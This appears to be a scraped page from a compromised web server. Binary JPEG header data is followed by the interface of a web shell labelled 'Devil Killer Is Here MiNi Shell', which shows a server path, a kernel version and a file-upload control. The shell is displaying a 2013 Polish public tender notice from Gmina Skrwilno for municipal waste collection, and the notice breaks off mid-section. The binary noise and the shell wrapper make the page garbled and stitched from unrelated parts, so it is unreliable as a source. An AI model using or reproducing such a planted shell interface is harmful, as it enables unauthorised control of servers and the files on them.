JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131115/466378-N-2013.html

<p class="kh_header"><b>Skrwilno: Odbieranie i zagospodarowanie odpadów komunalnych z terenu Gminy Skrwilno</b><br>
<b>Numer ogłoszenia: 466378 - 2013; data zamieszczenia: 15.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Skrwilno , ul. Rypińska 7, 87-510 Skrwilno, woj. kujawsko-pomorskie, tel. 054 2700012, faks 054 2700214.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.skrwilno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych z terenu Gminy Skrwilno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług na terenie Gminy Skrwilno w okresie od 01.01.2014 r. do 31.12.2014 r. w zakresie odbierania i zagospodarowania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy oraz z nieruchomości niezamieszkałych, na których powstają odpady komunalne.

2. Charakterystyka Gminy Skrwilno
	- Gmina wiejska. 
	- Powierzchnia terenu gminy wynosi 124,35  km2. 

	3. Gminę zamieszkuje 6136 mieszkańców stan na 31.12.2012 r. 
4. Sieć osadniczą Gminy tworzy 25 miejscowości Baba, Borki, Budziska, Czarnia Duża, Czarnia Mała, Klepczarnia, Kotowy, Mościska, Niemcowizna Szustkowska, Nowe Skudzawy, Okalewo, Otocznia, Przywitowo, Rak, Ruda, Skrwilno, Skudzawy, Szczawno, Szucie, Szustek, Toki, Urszulewo, Wólka, Zambrzyca, Zofiewo. 
5 Na terenie Gminy Skrwilno jest:
a. około 1356 nieruchomości zamieszkałych, jednorodzinnych Baba - 16, Borki - 21, Budziska - 29, Czarnia Duża - 28, Czarnia Mała - 30, Klepczarnia - 10, Kotowy - 77, Mościska - 33, Niemcowizna Szustkowska - 7, Nowe Skudzawy - 22, Okalewo - 183; 	Otocznia - 20; Przywitowo - 69, Rak - 44, Ruda - 52, Skrwilno - 368; Skudzawy - 89, 	Szczawno - 33; Szucie - 40, Szustek - 40, Toki - 10, Urszulewo - 46; Wólka - 25, Zambrzyca - 39, Zofiewo - 25.
b. około 71 nieruchomości niezamieszkałych, na których powstają odpady 	komunalne,
Czarnia Mała - 2, Kotowy - 1, Mościska - 1, Okalewo - 9, Przywitowo - 2, Skrwilno 37, Skudzawy - 3, Szustek - 1, Urszulewo - 11, Wólka - 1, Zambrzyca - 1
c. około 115 nieruchomości rekreacyjno-wypoczynkowych w miejscowości Urszulewo, na których powstawać będą odpady komunalne. Odpady na nieruchomościach rekreacyjno-wypoczynkowych powstawać będą na ogół sezonowo tj. przeważnie wyłącznie w okresie letnim. 
d. 3 nieruchomości wielorodzinne -Skrwilno, ul. Nowy Rynek 8 - 89 lokali 	mieszkalnych, Okalewo 136 - 9 lokali mieszkalnych, Okalewo 63 - 6 lokali 	mieszkalnych.
- powyższe dane mają charakter szacunkowy i będą ulegały zmianom w trakcie trwania umowy
6. Siedzibą władz Gminy jest miejscowość Skrwilno, która pełni także funkcję lokalnego centrum administracyjnego, usługowo - handlowego, oświatowego i kulturalnego. 
7. Rozmieszczenie poszczególnych miejscowości Gminy przedstawiono na mapie w załączniku nr 12 do SIWZ. 
8. Ze względu na rolniczy charakter gminy dominującym rodzajem zabudowy są gospodarstwa rolne z zabudową zagrodową rozproszoną. W miejscowościach Skrwilno, Ruda, Zambrzyca, Mościska, Czarnia Mała i Przywitowo dominuje zabudowa zwarta.
9. Przez teren Gminy Skrwilno przebiegają drogi wojewódzkie nr 560; 563, ponadto występują drogi powiatowe i gminne. W terenach zwartej zabudowy drogi te należą do dróg w głównej mierze utwardzonych. W przypadku zabudowy rozproszonej zagrodowej występują drogi gruntowe, których stan w okresie zimowym lub intensywnych opadów atmosferycznych może powodować utrudnienia w dotarciu do nieruchomości. 
10. Rozmieszczenie dróg występujących na terenie Gminy przedstawiono w załączniku nr 12 do SIWZ. 
11. Z terenu gminy Skrwilno w trzecim kwartale 2013 roku zebrano 167, 3 Mg odpadów,w tym:
Niesegregowane -zmieszane odpady komunalne - 101, 2 Mg ,kod odpadu 20 03 01
Opakowania z tworzyw sztucznych - 13, 2 Mg -kod odpadu 15 01 02
Opakowania z papieru i tektury - 9, 4 Mg -kod odpadu 15 01 01
Opakowania ze szkła - 23 Mg -kod dpadu15 01 07 
Odpady ulegające biodegradacji - 20, 5 Mg -kod odpadu 20 02 01

12. Na dzień 15 października 2013 r. sposób zbierania z nieruchomości zamieszkałych i niezamieszkałych:
a.Około 1348 właścicieli nieruchomości zadeklarowało segregację odpadów
b.Około 69 właścicieli nieruchomości zadeklarowało brak segregacji odpadów
13. Na dzień 15.10.2013 r. funkcjonuje 25 lokalnych punktów selektywnego zbierania odpadów komunalnych. Wykaz miejscowości, w których zlokalizowane są lokalne punkty przedstawiony został w punkcie 6. Lokalne punkty wyposażone będą przez Zamawiającego w pojemniki do zbierania poszczególnych frakcji odpadów. Nie wyklucza się, że w okresie realizacji zamówienia może zmienić się ilość lokalnych punktów selektywnego zbierania odpadów komunalnych, jak i ilość pojemników, w które wyposażane są punkty. Zmiana taka nie będzie stanowiła podstawy do zmiany umowy i nie będzie rodziła po stronie Wykonawcy roszczeń o zmianę wynagrodzenia. 
3. Wymogi dotyczące przekazywania odebranych odpadów komunalnych do instalacji przetwarzania odpadów komunalnych. 
Wykonawca wszystkie odebrane z terenu Gminy Skrwilno odpady komunalne obowiązany jest przekazywać zgodnie z wymaganiami art. 9e ust 1 ustawy o utrzymaniu czystości i porządku w gminach. 
4. Rodzaje odbieranych odpadów komunalnych. 
Odbieranie odpadów komunalnych od właścicieli nieruchomości, na których powstają odpady komunalne, odbywać się będzie z podziałem na: 
1. Odpady komunalne niesegregowane -zmieszane, 
2. Odpady komunalne segregowane: 
a. szkło, 
b. papier i tektura, tworzywa sztuczne, metale, opakowania wielomateriałowe, 
c. odpady biodegradowalne -dotyczy 103 nieruchomości w miejscowości Skrwilno.
5. Częstotliwość odbierania odpadów komunalnych z nieruchomości znajdujących się na terenie Gminy Skrwilno. 
1. Odpady komunalne niesegregowane -zmieszane
a. nieruchomości zamieszkałe i nieruchomości niezamieszkałe - co najmniej 1 x w miesiącu. 
b. Spółdzielnia Mieszkaniowa -SKRWA w Skrwilnie; 87-510 SKRWILNO, NOWY RYNEK 8 - co najmniej 2 razy w miesiącu.
c. nieruchomości rekreacyjno-wypoczynkowe 
- w okresie od 01 stycznia 2014 r. do 30 kwietnia 2014 r., co najmniej 1 x w miesiącu.
- w okresie od 01 maja 2014 r. do 30 września 2014 r., co najmniej 4 x w miesiącu.
- w okresie od 01 października 2014 r. do 31 grudnia 2014 r., co najmniej 1 x w miesiącu.
2. Odpady komunalne segregowane -frakcja sucha - co najmniej 1 x w miesiącu. W miesiącu lutym i listopadzie odpady segregowane z nieruchomości nie będą odbierane.
3. Odpady biodegradowalne:
- w okresie od 01 stycznia 2014 r. do 30 kwietnia 2014 r., co najmniej 1 x w miesiącu.
- w okresie od 01 maja 2014 r. do 30 września 2014 r., co najmniej 2 x w miesiącu.
- w okresie od 01 października 2014 r. do 31 grudnia 2014 r., co najmniej 1 x w miesiącu.
6. Częstotliwość odbierania odpadów komunalnych segregowanych z lokalnych punktów selektywnego zbierania odpadów znajdujących się na terenie Gminy Skrwilno. 
Lp.	Nazwa miejscowości	Ilość pojemników do segregacji	Częstotliwość odbiorów
		                              Plastik	Szkło	Makulatura	
1.Czarnia Mała przy świetlicy wiejskiej	1	1	1	co najmniej 1 x miesiącu
2.Czarnia Duża PKS	2	1		co najmniej 1 x miesiącu
3.Kotowy OSP	2	1		co najmniej 1 x miesiącu
4.Okalewo przy skrzyżowaniu	1	1	1	co najmniej 1 x miesiącu
5.Okalewo Pałac	2	1		co najmniej 1 x miesiącu
6.Okalewo Szkoła Podstawowa	2	1	1	co najmniej 2 x miesiącu, 
z wyjątkiem co najmniej
 1 x miesiącu -lipiec, sierpień
7.Mościska PKS	2	1		co najmniej 1 x miesiącu
8.Przywitowo OSP	2	1		co najmniej 1 x miesiącu
9.Rak Świetlica	2	1		co najmniej 1 x miesiącu
10.Ruda PKS	2	1		             co najmniej 1 x miesiącu
11.Skrwilno cmentarz	5	2		co najmniej 2 x miesiącu
12.Skrwilno Kasztanowa	2	1	co najmniej 1 x miesiącu
13.Skrwilno piekarnia	1	1	1	co najmniej 1 x miesiącu
14.Skrwilno przy moście	1	1	co najmniej 1 x miesiącu
15.Skrwilno Zespół Szkół	1	1     1co najmniej 2 x miesiącu, 
z wyjątkiem co najmniej
 1 x miesiącu -lipiec, sierpień
16.Skrwilno U.G.	1	2	1	co najmniej 2 x miesiącu
17.Szczawno centrum wioski	  2	1		co najmniej 1 x miesiącu
18.Skudzawy Szkoła Podstawowa	2	1		co najmniej 2 x miesiącu, 
z wyjątkiem co najmniej
 1 x miesiącu -lipiec, sierpień
19.Szustek	1	1		co najmniej 1 x miesiącu
20.Wólka	2	1		co najmniej 1 x miesiącu
21.Skrwilno Spółdzielnia mieszkaniowa SKRWA	9	3	3	co najmniej 2 x miesiącu
22.Urszulewo przy remizie OSP	1	1	1	- w okresie od 01 stycznia 2014 r. do 30 kwietnia 2014 r. co najmniej 1 x w miesiącu.
- w okresie od 01 maja 2014 r. do 30 września 2014 r. co najmniej 4 x w miesiącu.
- w okresie od 01 października 2014 r. do 31 grudnia 2014 r. co najmniej 1 x w miesiącu.
23.Urszulewo przy drodze w kierunku Skudzaw	3	2	1	
24.Zambrzyca	2	1	co najmniej 1 x miesiącu
25.Zofiewo	2	1		co najmniej 1 x miesiącu
7. Właściciele nieruchomości zobowiązani są umożliwić przedsiębiorcy dostęp do pojemników w dniu odbierania odpadów komunalnych z tych nieruchomości, przy wejściu na nieruchomość od strony ulicy -drogi publicznej, z możliwością wejścia na teren nieruchomości lub poprzez wystawienie pojemnika przed nieruchomością, w miejscu umożliwiającym swobodny dojazd do nich. 
8. Właściciele nieruchomości rekreacyjno-wypoczynkowych w Urszulewie będą dostarczali odpady do jednego, wyznaczonego punktu, z którego Wykonawca będzie odbierał odpady zmieszane i segregowane.

9. Wykonawca zobowiązany jest sporządzić harmonogramy odbierania odpadów, w formie papierowej i elektronicznej na wszystkie miesiące trwania umowy. Harmonogram na rok 2014 Wykonawca musi przedstawić Zamawiającemu do akceptacji najpóźniej na 7 dni od podpisania umowy. Wykonawca zobowiązany jest do dystrybucji zatwierdzonych harmonogramów do każdej nieruchomości objętej systemem odbioru odpadów. Wykonawca zobowiązany będzie również do dystrybucji wśród właścicieli nieruchomości innych dokumentów związanych z Systemem Gospodarki Odpadami o ile nie będą one wymagały potwierdzenia odbioru. Zmiana harmonogramu musi zostać ustalona przynajmniej na 3 miesiące przed planowanym terminem odbioru odpadów. Harmonogram powinien być tak skonstruowany, aby odbiór odpadów był regularny i powtarzalny. 

Wykonawca ma obowiązek przedkładania harmonogramu odbioru odpadów także Sołtysom poszczególnych sołectw w podanych wyżej terminach oraz obowiązek zamieszczania harmonogramu odbioru odpadów na tablicach ogłoszeń w poszczególnych sołectwach w podanych wyżej terminach oraz zamieszczenia harmonogramu odbioru odpadów na swojej stronie internetowej. 
Odbiór odpadów selektywnych od właścicieli nieruchomości, którzy zdeklarowali selektywną zbiórkę odpadów, prowadzony będzie zgodnie z harmonogramem, w sposób uniemożliwiający zmieszanie poszczególnych frakcji odpadów. 

10. Zamawiający w porozumieniu z Wykonawcą określi w umowie dotyczącej realizacji przedmiotu zamówienia, termin dostarczenia szczegółowego wykazu adresów nieruchomości objętych odbiorem odpadów komunalnych oraz niezbędnych informacji do sporządzenia harmonogramu odbioru odpadów oraz prowadzenia ewidencji i kontroli odbieranych odpadów komunalnych od właścicieli nieruchomości wynikających z zebranych deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi.
11. W zakresie utrzymania odpowiedniego stanu sanitarnego pojazdów i urządzeń wykonawca zapewnia: 
1. Utrzymywanie urządzeń do selektywnego gromadzenia odpadów komunalnych znajdujących się na terenie bazy magazynowo - transportowej we właściwym stanie technicznym i sanitarnym;
2. Zabezpieczanie pojazdów i urządzeń przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku oraz transportu; 
3. Poddawanie myciu i dezynfekcji pojazdów i urządzeń z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego. 
12. Obowiązek prowadzenia dokumentacji związanej z działalnością objętą zamówieniem: 	1.Prowadzenie kontroli nieruchomości objętych przedmiotem zamówienia w zakresie wywiązywania się z obowiązków wynikających z Regulaminu utrzymania czystości i porządku na terenie Gminy Skrwilno. 
2. Wykonawca ma obowiązek prowadzić wykaz nieruchomości na których stwierdził brak pojemnika na odpady zmieszane i przedstawić Zamawiającemu raport raz na kwartał.
3. W trakcie odbioru odpadów z terenu nieruchomości, na której nie zamieszkują mieszkańcy, a powstają odpady komunalne Wykonawca ma obowiązek sprawdzania czy rzeczywista pojemność pojemnika odpowiada pojemności pojemnika zadeklarowanej w Deklaracji o wysokości opłaty za gospodarowanie odpadami. W przypadku stwierdzenia, że pojemność pojemnika jest większa od zadeklarowanej pojemności pojemnika przez właściciela, Wykonawca obowiązany jest powiadomić niezwłocznie, jednak nie później niż w terminie 3 dni od zaistnienia zdarzenia, Zamawiającego o fakcie zbierania odpadów przez danego właściciela nieruchomości w pojemniku o większej pojemności niż zadeklarowana w deklaracji. 
4. Prowadzenie ilościowej i jakościowej ewidencji odpadów zgodnie z przepisami ustawy o odpadach. 
5. Prowadzenie sprawozdawczości zgodnie z zapisami ustawy o utrzymaniu czystości i porządku w gminach i innymi przepisami prawa. 
6. Prowadzenie dodatkowej comiesięcznej sprawozdawczości i przekazywanie Zamawiającemu do 10 dnia miesiąca następującego po miesiącu, którego dotyczy sprawozdanie, danych i informacji, w wersji papierowej lub elektronicznej na ustalonym z Zamawiającym nośniku danych oraz w ustalonym z Zamawiającym formacie. 
Zakres dodatkowej sprawozdawczości dotyczy: 
a. raportów miesięcznych zawierających informacje o ilościach i rodzajach odpadów od właścicieli nieruchomości w ramach realizacji przedmiotu zamówienia, 
b. raportów miesięcznych zawierających informacje o ilościach i rodzajach odpadów przekazanych do regionalnej instalacji przetwarzania odpadów komunalnych wraz z kopiami kart przekazania odpadów oraz ilościach i rodzajach selektywnie zebranych odpadów komunalnych przekazanych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami określoną w ustawie o odpadach wraz z kopiami kart przekazania odpadów. 
c. ilości nieruchomości zamieszkałych, z których odebrano odpady wraz ze wskazaniem nieruchomości, w których właściciele zbierają odpady niezgodnie z Regulaminem utrzymania czystości i porządku na terenie Gminy Skrwilno, 
d. informacji z systemów GPS dotyczących wszystkich przejazdów pojazdów transportujących odpady w zakresie: tras przejazdów każdego z pojazdów, miejsc zatrzymania pojazdów, a także momentów załadunku lub wyładunku odpadów,otwierania klapy w przypadku pojazdów typu śmieciarka i pojazdów typu HDS, oraz załadunku lub wyładunku kontenera w przypadku pojazdów typu hakowiec lub bramowiec, na żądanie zamawiającego,
7. W celu umożliwienia sporządzenia przez Zamawiającego rocznego sprawozdania z realizacji zadań z zakresu gospodarowania odpadami komunalnymi, o którym mowa w art. 9q ustawy, Wykonawca zobowiązany będzie przekazać Zamawiającemu niezbędne informacje umożliwiające sporządzenie sprawozdania. Wykonawca zobowiązany będzie również do przedkładania Zamawiającemu innych informacji nt. odbioru, unieszkodliwiania i segregacji odpadów, jeśli w trakcie realizacji zamówienia na Zamawiającego nałożony zostanie obowiązek sporządzania innych sprawozdań z zakresu gospodarki odpadami. Dotyczy to tylko informacji, w których posiadaniu będzie Wykonawca a nie Zamawiający;
8. Wykonawca będzie zobowiązany do dostarczenia Zamawiającemu także dokumentów potwierdzających recykling - DPR dotyczących odpadów komunalnych będących przedmiotem zamówienia, które muszą jednoznacznie potwierdzać, że odpady pochodzą z terenu Gminy Skrwilno
9. Wykonawca zobowiązany jest do składania kwartalnych informacji zawierających dane o ilości i rodzaju wydanych worków do selektywnej zbiórki odpadów. 
13. Szczegółowe wymagania stawiane Wykonawcy zamówienia: 
1. Ponoszenie pełnej odpowiedzialności wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy. 
2. Naprawa lub ponoszenie, wg wyboru Zamawiającego, kosztów naprawy szkód wyrządzonych podczas wykonywania usługi wywozu odpadów komunalnych w gminie, uszkodzenia chodników, ogrodzeń, punktów do składowania odpadów itp.. 
3. Posprzątanie rozsypanych odpadów, będących wynikiem nieodpowiedniego opróżniania pojemników na odpady komunalne i odstawienie pojemników na miejsca, z których zostały odebrane. Obowiązkiem Wykonawcy jest pozostawienie porządku i czystości w miejscach odbioru odpadów. Obowiązek ten winien być realizowany niezwłocznie po opróżnieniu pojemników. 
3a. Wykonawca ma także obowiązek uprzątnięcia terenu wokół pojemników z odpadów, które nie zostały zgromadzone w stosownych pojemnikach. Jeżeli zbierane odpady zgromadzone wokół pojemników można zakwalifikować do poszczególnych frakcji odpadów zbieranych w ramach Lokalnego Punktu Wykonawca wrzuca te odpady do stosownych pojemników lub zabiera w ramach poszczególnych frakcji. Jeżeli zbieranych odpadów zgromadzonych wokół pojemników nie można zakwalifikować do poszczególnych frakcji odpadów zbieranych w ramach Lokalnego Punktu Wykonawca zabiera te odpady, jako następująca frakcja: odpady zmieszane.
4. Odbieranie z nieruchomości każdej ilości odpadów komunalnych selektywnie zbieranych oraz niesegregowanych zgromadzonych w workach lub pojemnikach na odpady udostępnionych do odbioru zgodnie z pkt. 6 opisu przedmiotu zamówienia. 
5. Zapewnienie właścicielom nieruchomości znajdujących się na terenie Gminy Skrwilno, możliwości zakupienia bądź dzierżawy pojemników na odpady komunalne. 
6. Wykonawca wyposaży każdą nieruchomość, na której prowadzona jest selektywna zbiórka odpadów w worki na odpady segregowane. W kolejnych miesiącach Wykonawca będzie dostarczał worki do odpadów segregowanych w czasie odbioru worków zapełnionych w poprzednim okresie.
Kolory worków dostarczanych przez Wykonawcę:
- zbieranie papieru i tektury - kolor niebieski z napisem PAPIER i co wrzucamy a czego nie,
- zbieranie szkła - kolor zielony z napisem SZKŁO i co wrzucamy a czego nie,
- zbieranie plastiku, tworzyw sztucznych - kolor żółty z napisem PLASTIK i co wrzucamy a czego nie,
- zbieranie bioodpadów - kolor brązowy z napisem BIOODPADY i co wrzucamy a czego nie
7. Zaopatrywanie właścicieli nieruchomości w worki na odpady zbierane selektywnie wliczone jest w cenę wykonywania przedmiotu zamówienia. 
8. Pojemniki oraz worki powinny być dostosowane do wymagań wynikających z Regulaminu utrzymania czystości i porządku na terenie Gminy Skrwilno. 
9. Ilość i jakość dostarczanych worków do gromadzenia odpadów komunalnych zbieranych w sposób selektywny powinna odpowiadać ilości i rodzajowi odebranych odpadów z terenu danej nieruchomości. Zamawiający nie określa górnej granicy limitu worków przysługujących mieszkańcom podczas jednego rozdania. 
10. Odbieranie od właścicieli nieruchomości odpadów komunalnych zbieranych selektywnie zgromadzonych w innych workach lub pojemnikach pod warunkiem, że spełniają one wymagania określone w Regulaminie utrzymania czystości i porządku na terenie Gminy Skrwilno. 
11. Wykonanie przedmiotu umowy w sposób fachowy, niepowodujący niepotrzebnych przeszkód oraz ograniczający niedogodności dla mieszkańców Gminy do niezbędnego minimum. 
12. Zapewnienie, dla właściwej realizacji przedmiotu umowy, przez cały czas trwania umowy dostatecznej ilości środków technicznych, gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usługi. 
13. Wyposażenie własnych pracowników zajmujących się wywozem odpadów w odzież ochronną z widocznym logo firmy. 
14. Dokonywanie odbioru i transportu odpadów, również w przypadkach, kiedy dojazd do punktów zbiórki odpadów komunalnych będzie utrudniony z powodu prowadzonych remontów dróg, dojazdów itp. W takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy. 
15. Zamawiający dopuszcza możliwość chwilowego wstrzymania usługi przez Wykonawcę w przypadku nieprzejezdności dróg gruntowych spowodowanej warunkami atmosferycznymi, śnieg, obfite opady atmosferyczne. Wykonawca o takim przypadku poinformuje Zamawiającego a usługę wykona po ustaniu niekorzystnych warunków pogodowych.
16. Ponoszenie pełnej odpowiedzialności za należyte wykonanie powierzonych czynności zgodnie z obowiązującymi przepisami i normami. 
17. Okazanie na żądanie Zamawiającego wszelkich dokumentów potwierdzających wykonywanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa.
18. Wykonawca zobowiązany będzie do monitorowania obowiązku ciążącego na właścicielu nieruchomości w zakresie selektywnego zbierania odpadów komunalnych. W przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się z obowiązku w zakresie segregacji odpadów, Wykonawca odbiera odpady, jako niesegregowane -zmieszane, odpady komunalne w terminie przewidzianym dla danej frakcji, jednocześnie informując właściciela, co powinno znajdować się w wyznaczonym worku lub pojemniku oraz sporządza dokumentację fotograficzną, stanowiącą materiał do prowadzonego w następstwie stwierdzenia niedopełnienia obowiązku segregacji postępowania administracyjnego. Wykonawca zobowiązany będzie w terminie 2 dni roboczych od dnia zaistnienia opisanej sytuacji do pisemnego lub drogą elektroniczną poinformowania Zamawiającego o niewywiązaniu się z obowiązków segregacji odpadów przez właściciela nieruchomości. Do informacji Wykonawca zobowiązany będzie załączyć dokumentację fotograficzną i protokół z zaistnienia takiego zdarzenia. Z dokumentacji musi jednoznacznie wynikać, jakiej dotyczy nieruchomości, w jakim dniu i o jakiej godzinie doszło do ustalenia ww. zdarzenia.
19. Wykonawca jest zobowiązany do bieżącego przekazywania adresów nieruchomości, na których zamieszkują mieszkańcy lub nieruchomości, na których nie zamieszkują mieszkańcy a powstają odpady komunalne, a nie ujętych w bazie danych prowadzonej przez Zamawiającego.
20. Wykonawca w okresie obowiązywania umowy zobowiązany jest osiągnąć poziom recyklingu i przygotowania do ponownego użycia następujących frakcji odpadów komunalnych: papieru, metali, tworzyw sztucznych i szkła.
21. Wykonawca w okresie obowiązywania umowy zobowiązany jest ograniczyć masę odpadów komunalnych ulegających biodegradacji przekazywanych do składowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-1, 90.51.31.00-7, 90.51.40.00-3, 90.51.32.00-8, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
